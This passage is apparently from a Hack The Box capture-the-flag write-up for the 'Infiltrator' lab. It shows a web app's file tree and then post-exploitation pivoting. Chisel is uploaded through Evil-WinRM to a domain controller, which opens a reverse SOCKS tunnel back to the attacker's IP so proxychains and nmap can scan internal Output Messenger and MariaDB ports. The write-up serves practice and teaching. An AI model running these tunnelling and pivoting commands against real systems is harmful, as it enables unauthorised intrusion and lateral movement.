│ │ │ ├── Session_files_driver.php
│ │ │ ├── Session_memcached_driver.php
│ │ │ ├── Session_redis_driver.php
│ │ │ └── index.html
│ │ └── index.html
│ ├── Table.php
│ ├── Trackback.php
│ ├── Typography.php
│ ├── Unit_test.php
│ ├── Upload.php
│ ├── User_agent.php
│ ├── Xmlrpc.php
│ ├── Xmlrpcs.php
│ ├── Zip.php
│ └── index.html
└── wall
├── assets
│ ├── chosen
│ │ ├── chosen.css
│ │ ├── chosen.jquery.js
│ │ ├── chosen.jquery.min.js
│ │ ├── image.chosen.jquery.js
│ │ ├── image.chosen.jquery.min.js
│ │ ├── menu.chosen.jquery.js
│ │ └── menu.chosen.jquery.min.js
│ ├── css
│ │ ├── bootstrap-theme.css
│ │ ├── bootstrap-theme.min.css
│ │ ├── bootstrap.css
│ │ ├── bootstrap.min.css
│ │ ├── font-awesome-ie7.css
│ │ ├── font-awesome-ie7.min.css
│ │ ├── font-awesome.css
│ │ ├── font-awesome.min.css
│ │ ├── google
│ │ │ ├── DXI1ORHCpsQm3Vp6mXoaTXhCUOGz7vYGh680lGh-uXM.woff
│ │ │ ├── EInbV5DfGHOiMmvb1Xr-hnhCUOGz7vYGh680lGh-uXM.woff
│ │ │ ├── MTP_ySUJH_bn48VBG8sNSnhCUOGz7vYGh680lGh-uXM.woff
│ │ │ ├── PRmiXeptR36kaC0GEAetxh_xHqYgAV9Bl_ZQbYUxnQU.woff
│ │ │ ├── PRmiXeptR36kaC0GEAetxjqR_3kx9_hJXbbyU8S6IN0.woff
│ │ │ ├── PRmiXeptR36kaC0GEAetxkCDe67GEgBv_HnyvHTfdew.woff
│ │ │ ├── PRmiXeptR36kaC0GEAetxn5HxGBcBvicCpTp6spHfNo.woff
│ │ │ ├── cJZKeOuBrn4kERxqtaUH3T8E0i7KZn-EPnyo3HZu7kw.woff
│ │ │ ├── index.html
│ │ │ ├── k3k702ZOKiLJc3WVjuplzHhCUOGz7vYGh680lGh-uXM.woff
│ │ │ ├── open-sans.css
│ │ │ └── xjAJXh38I15wypJXxuGMBobN6UDyHWBl620a-IRfuBk.woff
│ │ └── wall.css
│ ├── editor
│ │ ├── jquery-te-1.4.0.css
│ │ ├── jquery-te-1.4.0.js
│ │ ├── jquery-te-1.4.0.min.js
│ │ └── jquery-te.png
│ ├── emoji
│ │ ├── blank.gif
│ │ ├── cat0.png
│ │ ├── cat1.png
│ │ ├── cat2.png
│ │ ├── cat3.png
│ │ ├── cat4.png
│ │ ├── config.js
│ │ ├── config.min.js
│ │ ├── emoji.all.js
│ │ ├── emoji.css
│ │ ├── emoji.js
│ │ ├── emoji.min.css
│ │ ├── emoji.min.js
│ │ └── menu-icons.png
│ ├── fileapi
│ │ ├── fileapi.js
│ │ ├── fileapi.min.js
│ │ └── fileuploader.css
│ ├── fileupload
│ │ ├── jquery.fileupload-all.min.js
│ │ ├── jquery.fileupload-process.js
│ │ ├── jquery.fileupload-process.min.js
│ │ ├── jquery.fileupload-validate.js
│ │ ├── jquery.fileupload-validate.min.js
│ │ ├── jquery.fileupload.js
│ │ ├── jquery.fileupload.min.js
│ │ ├── jquery.iframe-transport.js
│ │ └── jquery.iframe-transport.min.js
│ ├── fonts
│ │ ├── fontawesome-webfont.eot
│ │ ├── fontawesome-webfont.svg
│ │ ├── fontawesome-webfont.ttf
│ │ ├── fontawesome-webfont.woff
│ │ ├── glyphicons-halflings-regular.eot
│ │ ├── glyphicons-halflings-regular.svg
│ │ ├── glyphicons-halflings-regular.ttf
│ │ ├── glyphicons-halflings-regular.woff
│ │ └── glyphicons-halflings-regular.woff2
│ ├── img
│ │ ├── app_window.png
│ │ ├── awards.png
│ │ ├── awards_small.png
│ │ ├── chosen-sprite.png
│ │ ├── comment-blue.svg
│ │ ├── comment.png
│ │ ├── comment.svg
│ │ ├── doc.png
│ │ ├── emotions.gif
│ │ ├── filetypes.png
│ │ ├── like-blue.svg
│ │ ├── like-filled.svg
│ │ ├── like.png
│ │ ├── like.svg
│ │ ├── loader.gif
│ │ ├── loading50x50.gif
│ │ ├── new_window.png
│ │ ├── outputwall-128.png
│ │ ├── outputwall-18.png
│ │ ├── outputwall-24.png
│ │ ├── pdf.png
│ │ ├── ppt.png
│ │ ├── txt.png
│ │ └── xls.png
│ ├── js
│ │ ├── bootstrap.min.js
│ │ ├── jquery-1.8.2.min.js
│ │ ├── jquery-3.1.0.min.js
│ │ ├── jquery.masonry.min.js
│ │ ├── jquery.nicescroll.min.js
│ │ ├── jquery.tmpl.min.js
│ │ ├── jqueryui
│ │ │ ├── index.html
│ │ │ ├── jquery-ui-1.8.21.custom.min.js
│ │ │ ├── jquery-ui-1.8.23.custom.min.js
│ │ │ ├── jquery-ui-1.9.2.autocomplete.js
│ │ │ ├── jquery-ui-1.9.2.core.min.js
│ │ │ ├── jquery-ui-1.9.2.custom.min.js
│ │ │ ├── jquery-ui-1.9.2.datepicker.min.js
│ │ │ ├── jquery-ui-1.9.2.js
│ │ │ ├── jquery-ui-1.9.2.min.js
│ │ │ ├── jquery-ui-1.9.2.sortable.min.js
│ │ │ └── jquery-ui-1.9.2.spinner.min.js
│ │ ├── knockout-2.2.1.js
│ │ ├── knockout-3.4.0.js
│ │ ├── knockout-sortable.min.js
│ │ └── zoomico.png
│ ├── mcustom
│ │ ├── jquery.mCustomScrollbar.js
│ │ ├── jquery.mCustomScrollbar.min.css
│ │ ├── jquery.mCustomScrollbar.min.js
│ │ ├── jquery.mousewheel.min.js
│ │ └── mCSB_buttons.png
│ ├── min
│ │ ├── main.min.js
│ │ ├── notification.min.js
│ │ ├── post.min.js
│ │ ├── smily.min.js
│ │ └── users.min.js
│ ├── plugin
│ │ ├── autosize.js
│ │ ├── autosize.min.js
│ │ ├── dateformat.js
│ │ ├── dateformat.min.js
│ │ ├── jhelpers.js
│ │ ├── jhelpers.min.js
│ │ ├── jquery.visible.js
│ │ ├── ko-handlers.js
│ │ └── ko-handlers.min.js
│ ├── scrollbot
│ │ ├── scrollbot.js
│ │ └── scrollbot.min.js
│ ├── site
│ │ ├── main.js
│ │ ├── notification.js
│ │ ├── post.js
│ │ ├── smily.js
│ │ └── users.js
│ ├── socket
│ │ └── sockjs.min.js
│ ├── summernote
│ │ ├── font
│ │ │ ├── summernote.eot
│ │ │ ├── summernote.ttf
│ │ │ └── summernote.woff
│ │ ├── summernote.css
│ │ ├── summernote.js
│ │ └── summernote.min.js
│ └── textcomplete
│ ├── jquery.textcomplete.js
│ ├── jquery.textcomplete.min.js
│ └── jquery.textcomplete.min.map
├── config.org.php
├── config.php
├── data.json
├── db.sql
├── index.php
├── notification.php
├── post.php
├── post_grid_view.php
├── post_list_view.php
├── post_new.php
├── postdata.php
├── right_menu.php
├── single_post_popup_content.php
└── user_profile.php
69 directories, 445 filesTunneling
According to PEAS, the instance appears to use various ports, 14xxx, and those ports are not exposed.
It would require tunneling in order to pivot into the internal service
Checking the documentation reveals the usage of those ports
Setting up the socks5 proxy
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ chisel server -p 55555 --reverse -v
2024/09/01 21:12:24 server: Reverse tunnelling enabled
2024/09/01 21:12:24 server: Fingerprint EIumo1h6z30BfGwYIYE+w+9gsXzKAWP/HJpoOlagN9s=
2024/09/01 21:12:24 server: Listening on http://0.0.0.0:55555Starting a Chisel server
*Evil-WinRM* PS C:\Users\M.harris\Documents> upload chiselx64.exe chisel.exe
Info: Uploading /home/kali/archive/htb/labs/infiltrator/chiselx64.exe to C:\Users\M.harris\Documents\chisel.exe
Data: 10974548 bytes of 10974548 bytes copied
Info: Upload successful!Uploaded Chisel to the dc01.infiltrator.htb host
*Evil-WinRM* PS C:\Users\M.harris\Documents> .\chisel.exe client 10.10.14.136:55555 R:48823:socks
2024/09/01 12:19:09 client: Connecting to ws://10.10.14.136:55555
2024/09/01 12:19:09 client: Connected (Latency 38.9611ms)Connecting to Kali from the dc01.infiltrator.htb host
Connected
Pivoting
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ proxychains4 -q nmap -Pn -sC -sV localhost -p14118,14119,14121,14122,14123,14125,14126,14127,14128,14130,14406
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-01 21:24 CEST
Stats: 0:01:53 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 36.36% done; ETC: 21:29 (0:03:14 remaining)
Nmap scan report for localhost (127.0.0.1)
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
14118/tcp open ssl/unknown
|_ssl-date: 2024-09-01T19:29:29+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Output Messenger/organizationName=Srimax/stateOrProvinceName=Tamil Nadu/countryName=IN
| Not valid before: 2016-04-14T10:22:17
|_Not valid after: 2066-04-02T10:22:17
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
|_ Ouput Messenger Server - Switching Server V2.0.42.0
14119/tcp open ssl/unknown
| ssl-cert: Subject: commonName=Output Messenger/organizationName=Srimax/stateOrProvinceName=Tamil Nadu/countryName=IN
| Not valid before: 2016-04-14T10:22:17
|_Not valid after: 2066-04-02T10:22:17
|_ssl-date: 2024-09-01T19:29:29+00:00; -1s from scanner time.
14121/tcp open unknown
14122/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
|_ Ouput Messenger Server - Switching Server V2.0.42.0
14123/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-title: Output Messenger
|_Requested resource was http://localhost:14123/ombro/index.html
|_http-server-header: Microsoft-HTTPAPI/2.0
14125/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesnt have a title (application/json; charset=utf-8).
14126/tcp open http Apache httpd 2.4.9 ((Win32) PHP/5.5.12)
|_http-server-header: Apache/2.4.9 (Win32) PHP/5.5.12
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Index of /
14127/tcp open unknown
14128/tcp open unknown
14130/tcp open unknown
14406/tcp open mysql MySQL 5.5.5-10.1.19-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.1.19-MariaDB
| Thread ID: 61
| Capabilities flags: 63487
| Some Capabilities: Speaks41ProtocolNew, SupportsCompression, Speaks41ProtocolOld, SupportsLoadDataLocal, LongColumnFlag, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, InteractiveClient, SupportsTransactions, IgnoreSigpipes, FoundRows, DontAllowDatabaseTableColumn, LongPassword, Support41Auth, ODBCClient, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: )WY:Tx~3~F!p2HQ@+TGH
|_ Auth Plugin Name: mysql_native_password
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
[...REDACTED...]
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 315.88 secondsBased on the Nmap scan result;
- web application is hosted over the port
14123 - backend DB is on the port
14406